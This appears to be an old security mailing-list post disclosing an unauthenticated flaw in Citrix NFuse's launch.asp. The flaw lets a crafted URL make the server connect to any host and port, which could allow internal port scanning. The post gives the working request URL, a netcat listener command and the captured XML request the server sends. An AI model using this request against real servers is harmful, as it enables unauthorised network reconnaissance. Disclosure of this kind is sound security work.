lame citrix bug, anyone think of anything interesting?

["wirepair" <wirepair () roguemail net>]

lo again,
Yeah I know I'm getting of tired of Citrix too. While messing around with NFuse I found out i can basically redirect to any port 
to any server. Using 
http://nfusehost/Citrix/launch.asp?NFuse_CitrixServer=ip.ip.ip.ip&NFuse_CitrixServerPort=9000&NFuse_Transport=HTTP&NFuse_Application=Weee&NFUSE_USER=Administrator&NFuse_MIMEExtension=.ica
So I guess we could use this to do a port scan by guessing response time for ports. You could probably map the internal hosts for 
services and such. Its pretty weak but I guess it could help someone at sometime. Oh also you don't need to authenticate to use 
launch.asp...
The data it sends is:
root@jebus:/home/fbi# nc -l -v -p 9000
listening on [any] 9000 ...
connect to [my.ip.ip.ip] from (UNKNOWN) [nfuse.ip.ip.ip] 3939
POST /scripts/wpnbr.dll HTTP/1.1
Content-Type: text/xml
Host: my.ip.ip.ip:9000
Content-Length: 1100
Connection: Keep-Alive

<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE NFuseProtocol SYSTEM "NFuse.dtd">
<NFuseProtocol version="4.1">
    <RequestAppData>
        <Scope traverse="onelevel"></Scope>
        <DesiredDetails>all</DesiredDetails>
        <AppName>Wee</AppName>
        <ServerType>all</ServerType>
        <ClientType>ica30</ClientType>
        <Credentials>
            <UserName>Administrator</UserName>
            <Password encoding="ctx1"></Password>
            <Domain type="NT"></Domain>
        </Credentials>
    </RequestAppData>
</NFuseProtocol>


Anyone else got some tricks you could possibly use this for? 
-wire
--
Visit Things From Another World for the best
comics, movies, toys, collectibles and more.
http://www.tfaw.com/?qt=wmf